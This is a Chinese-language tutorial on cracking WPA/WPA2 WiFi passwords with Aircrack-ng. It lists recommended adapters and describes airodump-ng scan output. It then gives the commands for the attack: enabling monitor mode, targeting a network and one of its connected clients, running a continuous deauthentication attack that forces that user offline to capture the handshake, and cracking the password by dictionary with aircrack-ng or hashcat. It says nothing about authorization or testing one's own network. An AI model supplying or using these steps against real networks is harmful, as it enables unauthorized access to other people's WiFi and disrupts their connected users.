Aircrack-ng是一個基於WiFi無線網絡分析有關的安全軟件,主要功能有網絡偵測、數據包嗅探、WEP和WPA/WPA2-PSK破解等。
因為安全性的原因。現在,周圍很少有用WEP算法來加密的WiFi密碼,不過基本命令都很相似。
WiFi網絡構成
(1)WiFi是一個建立於IEEE 802.11標准的無線局域網絡(WLAN)設備。
(2)WiFi工作原理AP(Access Point 例如:無線路由器)每100ms將SSID(Service Set Identifier)經由beacons(信號台)封包廣播一次。
一 准備合適的無線網卡
USB無線網卡
aircrack-ng官方推薦網卡
- Alfa AWUS036H [b/g USB]
- Ubiquiti SRC [a/b/g Cardbus]
- Ubiquiti SRX [a/b/g ExpressCard]
- Airpcap series [USB]
- TP-Link TL-WN722N v1 [b/g/n USB] - Beware, if version is not specified by vendor, it is NOT v1
- Alfa AWUS036NHA [b/g/n USB]
- Alfa AWUS051NH v2 [a/b/g/n USB]
- MiniPCIe: anything that uses ath9k, especially AR92xx and AR93xx (ability to do spectral scan)
二 具體步驟
啟動網卡監聽模式
iwconfig 查看網卡信息
一般默認網卡名稱為 wlan0
airmon-ng start wlan0 啟動監聽模式
若再次輸入iwconfig 可以看到網卡名稱已變成wlan0mon
掃描WiFi網絡
airodump-ng wlan0mon(網卡名稱)

——掃描到的WiFi熱點信息
BSSID:WiFi路由器的MAC地址
PWR:網卡報告信號水平,信號值越高說明離AP越近。(PWR=-1,網卡驅動不支持報告此項信息)
Beacons:無線AP發出的通告編號
#Data:被捕獲到的數據分組的數量(一般數據量越大,抓取握手包更容易)
#/s:過去10秒鍾內每秒捕獲數據分組的數量
CH:信道號(從Beacon中獲取)
MB:無線AP所支持的最大速率
ENC:加密算法體系
CIPHER:加密算法
AUTH:使用的認證協議
ESSID:wifi名稱

BSSID :WiFi的MAC地址
STATION:連接前面WiFi的用戶MAC地址
需要記錄准備破解的WiFi MAC地址,已連接WiFi的用戶MAC WiFi的信道號
(沒有用戶連接的WIFI不能抓取握手包,也就不能破解)
准備抓取握手包
airodump-ng -c [信道號] --bssid [apMAC] -w [保存的文件名] wlan0mon
airodump-ng -c --bssid -w wlan0mon
使已連接WiFi的用戶A強制下線,之后A會向WiFi路由重新發送一個帶密碼的請求握手包
aireplay-ng -0 0(攻擊數據包數量,為0代表一直攻擊) -a [ WiFi MAC地址] -c [ 用戶 MAC地址] wlan0mon
成功之后的暴力破解
利用字典 aircrack-ng (保存的文件名.cap)-w (字典的絕對路徑)
關於密碼破解,可以使用kali自帶的hashcat使效率大大增加
轉換握手包格式為hccap(hccapx)
aircrack-ng (抓取到的握手包文件名) -J (轉換后的文件名)
開始破解
hashcat -m 2500 .hccap password.txt
參數: -m 2500為破解的模式為WPA/PSK方式 hccap格式的文件是剛剛轉化好的文件 字典文件
注:最新版hashcat一般情況下不支持hccap格式,第一步需將握手包cap格式轉換為hccapx
